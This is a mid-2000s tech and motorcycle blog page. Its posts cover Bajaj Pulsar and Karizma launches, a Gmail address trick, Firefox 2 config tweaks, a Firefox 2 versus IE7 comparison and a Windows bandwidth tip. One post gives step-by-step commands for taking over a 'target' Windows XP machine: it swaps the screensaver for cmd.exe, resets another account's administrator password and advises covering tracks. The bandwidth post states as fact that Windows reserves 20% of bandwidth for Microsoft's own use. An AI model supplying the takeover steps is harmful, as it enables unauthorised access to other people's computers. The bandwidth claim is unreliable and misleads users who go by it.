Pulsar 220 Launched....

First Pics of the Pulsar 220 in Pune Probiking Showroom
There has been reports posted today morning on XBhp and Overdrive Forums stating that the Bajaj Pulsar 220 DTSFi has been spotted on display in a Bajaj Showroom in Pune ... Catch the discussion in Overdrive forum hereThe best part is the Price. It seems the Pulsar 220 DTSFi has been priced at Rs.83,559 (on road) in Pune..!!

"Disclaimer: The veracity of the news is yet to be validated.... Stay tuned for confirmation of the news" If the above news is true then its a very competitive price by Bajaj Auto. The Pulsar 220's nearest rival the Hero Honda Karizma is priced around Rs.81,000 (on road) in Pune. And with the kind of goodies that come with the Pulsar 220 DTSFi, I think it is still Rs.15,000 cheaper for what it has been priced.

Great news for Bike Enthusiasts..!!

New look Karizma

Oooohh technical advancement at HH, first red spark plug cables and now red alloys,
Actually a major advantage of owning a HH bike is youre always sure that HH is not gonna outdo the earlier models like Bajaj.
eg. the old CBZ wins hands down in front of the hideous new one.

Now the Karizma, existing zma owners will be laughing their hearts out. Red alloys...red alloys....
i mean who takes care of design in the HH R&D if such a thing exists.

Oh dear and that graphics. Somebody tell me this is not happening, there is still time for HH to rethink. Just imagine the fate of guys who buy red zmas, their alloys would color coordinate.... ...UUGGHHH........NOW EVEN THE CHINESE CAN LAUGH AT US..HH..PLEEAASSE..NOOO

Google Hacks

Recently discovered something very unusual about the gmail email id.
Suppose that if you have a gmail id by the name of carljohnson@gmail.com, then it is same as carl.johnson@gmail.com and even same as c.a.r.l.j.o.h.n.s.o.n@gmail.com ,yes this is true there is ABSOLUTELY NO DIFFERENCE between these 3 ids.

Ah, now i know you want to check them yourselves....go on...

The reason for this is that the gmail server does not recognise the dot(.) character and so this kind of thing occurs. And yes one more thing.

One more name for your e-mail id would be carl.johnson@googlemail.com
If u like it please post comments....

I don have words to say about it.... Mono shock, Scilencer under the seat, very high profile tyres, twin disk in front, single rear disk, 550cc, 65BHP, 0-100 in under 5 sec...???

!!!!This is Definitely Male!!!!

New Pulsar 150 DTS-i launched

The "New Look" Bajaj Pulsar 150 has been finally launched (in Mumbai atleast) after the "New Look" Pulsar 180. This is the 4'th in the line of up gradations (1'st:Classic Pulsar; 2'nd:Pulsar DTSI; 3'rd; Pulsar DTSI with Alloys and Gas filled Rear shocks).
a
The news was picked up from the
XBhp.Com forum.
a
New Looks: The new Pulsar 150 shares similar features and looks of its bigger 180 c.c sibling. It gets the 180's
Digital Speedo, Tachometer assembly
Redesigened side and tapered tail panels
Rear "Led" (Light Emitting Diodes) tail light
The "Phantom" front fairing
What distinguishes the new pulsar 180 from the 150 is the "All Black" paint scheme (engine covers, exhaust, chain cover and alloys).
Improvements: Bajaj seems to have worked on the "Achilles heel" of the Pulsar by adopting a new gear shifting mechanism. It seems to have made quite improvement in the shift quality now. Moreover, the 150 now comes with the 1-down, 4-up pattern (similar to the 180) now.
Power: seems to have been upped from 13.5 b.h.p to 14.2 b.h.p (to counter the CBZ Xtreme probably) with increase in torque too.
Price: The new 180 did not come with any price increase but Bajaj seems to have increased the price of the 150. It seems the price difference between the 180 and 150 is now just around 2k (yet to be confirmed).
With such a slender price difference and just the "All Back" treatment to differentiate the looks between the 150 and 180, it seems Bajaj wants the customer to make a choice between "Power" of the 180 and the "Economy" of the 150.
It will be now interesting to note which one prevails.

Top Firefox 2 config tweaks

The Firefox homepage calls the web browser "fully customizable to your online life," and that's not just marketing claptrap. Beyond the extensive options available in its menus and dialogs, there's a lengthy set of advanced Firefox preferences that can customize the browser to your specific needs. Sure, your brother-in-law's not likely to edit Firefox's default configuration, but you? You're a power surfer and you want your web browser your way.
In honor of the Firefox 2.0 release yesterday, today we'll dive deep into the bowels of the fox's config with a handful of my favorite Firefox 2 (and older) tweaks.
How to modify Firefox's configuration (about:config)
All this "advanced config" talk got you worried? Fear not, my friend. Here's the deal: Firefox's configuration is a long list of keys and values. To view this list, type about:config into the Firefox address bar. Then, enter the name of the key you want to update in the "Filter" field. The list will narrow to only the entries that match your keyword as you type

(The key, of course, is knowing the key. More on that below.) To modify the value of a key, double-click on the value field and update the entry. To see your changes, restart your browser. Easy as pie.
Got it? Good. Let's get to tweaking.
Session restore
Fx 2.0 only: As a blogger and web mail user, it breaks my heart to recount how many times I've composed a long post or email message, then accidentally closed the tab or browser and lost all my work. No more! With Firefox 2, set the browser.startup.page key to 3 to restore your browsing session - with form entries intact! - every time you start your browser or undo close tab after a wayward click. Note: By default, Firefox 2 automatically restores your session if your browser crashes - but this does it every time you restart your browser normally. Thanks for the tip, Arun!
Key: browser.startup.page
Modified Value: 3
Default: 1 (open your specified homepages)
Update: Ryan points out that doing it this way is like swatting a fly with a sledgehammer. To do it the normal person way, from the Tools menu choose Options, and in the Main area, select "Show my windows and tabs from last time" from the "When Firefox starts" dropdown. D'oh! Thanks Ryan!
Tab width before scrolling kicks in
Fx 2.0 only: The biggest interface changes in Firefox 2 involve tabbed browsing. Power surfers who open more than a dozen tabs will notice that Firefox 2 minimizes tabs to a certain width, then sets the excess to scroll off the tab bar with left and right arrows. As someone who often has more than a dozen tabs open, not being able to see them all made me crazy. One solution is to reduce the minimum tab width so that more tabs fit in the bar before the scroll kicks in. The default is 100 pixels; I found that 75 worked better for me - page titles were still readable, but more tabs could fit. Compare 100 width, which fits 7 tabs across at this size :

To 75, which fits 10 across at this size :

To disable tab scrolling entirely, set the value to 0.
Key: browser.tabs.tabMinWidth
Modified Value: 75 (fit in more tabs before overflow enables scroll)
Alternate Modified Value: 0 (disable scroll entirely)
Default: 100
Tab close buttons
Fx 2.0 only: Another tab interface change in Firefox 2 is the addition of a close button on each individual tab. I happen to love this, but some hate it, saying it causes them to accidentally close a tab when just trying to switch to it. If you're a hater, revert to the Firefox 1.5 behavior by changing the browser.tabs.closeButtons value to 3. This will not display close tabs on individual tabs, and turn on a single close tab button at the right end of the tab bar.
Key: browser.tabs.closeButtons
Modified Value: 3 (revert to Firefox 1.5 behavior)
Alternate Modified Value: 2 (don't display any close tab buttons)
Default: 1 (display close buttons on all tabs)
Fetch only what you click
Fx .6 and up: Firefox has this wacky little feature that downloads pages from links it thinks you may click on pages you view, like the top result on a page of Google results. This means you use up bandwidth and CPU cycles and store history for web pages you may not have ever viewed. Creepy, eh? To stop that madness, set the network.prefetch-next key to false.
Key: network.prefetch-next
Modified Value: false
Limit RAM usage
All versions: Goodness knows I've done a good amount of belly-aching about Firefox's voracious appetite for RAM. (It's consistently the most memory-intensive process on both my PC and Mac.) Happily a simple config tweak got Mem Use right back down to a more comfortable number. Along with the previous prefetch mod, set your browser.cache.disk.capacity to a value that fits your total RAM.
Key: browser.cache.disk.capacity
Modified Value: Depends on your system's total memory. According to Computerworld:
For RAM sizes between 512BM and 1GB, start with 15000. For RAM sizes between 128MB and 512M, try 5000.
For RAM sizes between 512BM and 1GB, start with 15000. For RAM sizes between 128MB and 512M, try 5000.
Turn off chrome tooltips
All versions: I have an irritating Firefox problem on my Mac. When I try to drag a bookmark into one of my bookmark toolbar folders, the tool tip gets in the way and prevents the drop from working. Argh! Like you, I already know what all the buttons on my browser chrome do, so the tool tips aren't necessary. To turn them off, set the browser.chrome.toolbar_tips key value to false. Bonus is, it solved my Mac's bookmark drag and drop problem.
Key: browser.chrome.toolbar_tips
Modified Value: false
Lastly, though 2.0's default value is a lot more reasonable than 1.5's, you can use about:config to put off that annoying Unresponsive Script dialog on Javascript-heavy web pages.
Update: From the comments, a few more good about:config tweaks:
layout.spellcheckDefault = 2 turns on Firefox 2's spell-checking in input fields as well as textareas. (That means no more typos in Lifehacker post headlines!)
browser.urlbar.hideGoButton=true turns off the rarely-used Go button at the end of the address bar, for more room to see long URLs. Thanks, sister-ray!
See the MozillaZine about:config wiki page for the exhaustive list of Firefox preferences keys, their possible values and effects.
What are your favorite Firefox about:config tweaks? Post 'em up in the comments.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ *drops to rootcd\windows\system32 *directs to the system32 dirmkdir temphack *creates the folder temphackcopy logon.scr temphack\logon.scr *backsup logon.scrcopy cmd.exe temphack\cmd.exe *backsup cmd.exedel logon.scr *deletes original logon.scrrename cmd.exe logon.scr *renames cmd.exe to logon.screxit *quits dos
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Like 2 speed up internet by 20% ???

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes. This opens the group policy editor. Then go to:
Local Computer Policy
then Computer Configuration
then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

How did you like it.please comment.

Note:This trick works only for windows xp sp2 professional and windows 2000 professional. It does not work on windows xp sp2 home edit.

Firefox 2.0 Vs IE7

Firefox 2.0 was unofficially released via FTP and I had a chance to take a test drive. The download was 5.62 MBs but it was a very specific installer for my machine and you do have to pick the right OS build, localization, and language. The install was smooth and fast and the first time load was fast as well.

Once installed, I noticed that load times for IE7 and Firefox 2.0 were roughly the same. To get some official numbers, I used Process Explorer to measure the specifics on CPU time and I/O usage. Here are the numbers I generated.

CPU timeI/O readsI/O writesI/O otherMemory
IE70.643056235922.8 MB
FF20.8621207312420.9 MB

As you can see, there is very little difference in the CPU utilization and memory foot print and both browsers are very respectable. IE7 takes a little more RAM but Firefox does a lot more I/O reads which might result in slightly longer load times depending on how busy the hard drive is. Most of the time there will be no noticeable difference.

Now let's look at the GUI (Graphical User Interface) for these two brand new browsers from Mozilla and Microsoft. This is one area Microsoft seems to have leapfrogged the competition and put a lot of work in to the User Interface. Here is a series of screen shots that illustrate the differences.

Default view for Firefox 2 and Internet Explorer 7

In the default view for both browsers, you'll notice a long grey bar in Firefox 2.0 that doesn't seem to serve any purpose other than to waste screen space. Maybe it can be used for customization or something, but I haven't figured out what to do with it yet and it never shows anything different when I'm surfing a webpage. The classic menu bar for IE7 is hidden in this view.

ALT key reveals classic menu in IE7

By holding down the ALT key in IE7, the classic menu bar will be revealed. This makes both browsers use up the same screen real-estate. However, IE7 is showing you the webpage tabs the entire time while FF2 hides the webpage tabs until you actually have more than one webpage open. That wouldn't happen until you actually open up a second webpage in a new tab which isn't entirely obvious or intuitive. IE7 makes it blatantly obvious where you can open up a new tab.

Tabbed browsing engaged in both FF2 and IE7

When tabbed browsing is engaged in both browsers, the IE7 UI doesn't use up any additional room while FF2 eats up an entire new row. Again I still don't see the purpose for the blank bar below the navigation buttons and it seems to be a waste of space. In this comparison, FF2 is using almost twice as much UI space as IE7. A close button has been added to each tab in FF2 making it equivalent to IE7 but the amount of wasted UI space in FF2 is annoying when you compare it to IE7.

Both browsers can be extended with third party add-ons. Like IE7 which was released last week, Firefox 2.0 also includes native anti-phishing features. IE7 has a native RSS reader while FF2 has RSS add-ons you can add to the browser. IE7 has the new zoomed out view of all the pages you have in your tabs while FF2 has a built-in spell checker.

IE7 has a new birds eye view of all the tabbed pages

When you have a lot of webpage tabs, it's nice to be able to see a miniature view of all the webpages you have opened. Firefox 2.0 lacks this feature.

FF2 has this awesome new spell checker

When you spend as much time as I do on forums, a built-in spell checker comes in real handy. This is a feature I wished IE7 had but for now my only choice is to cut/paste my text in to MS Word where I can check the spelling and grammar or use FF2 and its built in spell checker.

On a last note, reader Toadlife posted a note to a website that is designed to crash Firefox. When I followed the link, it completely crashed Firefox 2.0 and popped up the error reporting program that gives technical feedback to Mozilla. This certainly gave me a scare because any kind of crash in an application usually means there is a flaw in the web browser which might be potentially exploitable. But when I went to that same site with Internet Explorer 7, it crashed as well so it may be some kind of issue that affect both browsers. I'll have to check with both Microsoft and Mozilla on this issue.

Each next generation browser from Microsoft and Mozilla has its strengths and weaknesses. I would definitely recommend people try both browsers and make their own decision which browser is for them. Firefox 2.0 could use a face lift and a sleeker UI in my opinion and Internet Explorer 7 could use a spell checker and I hope each company is listening.
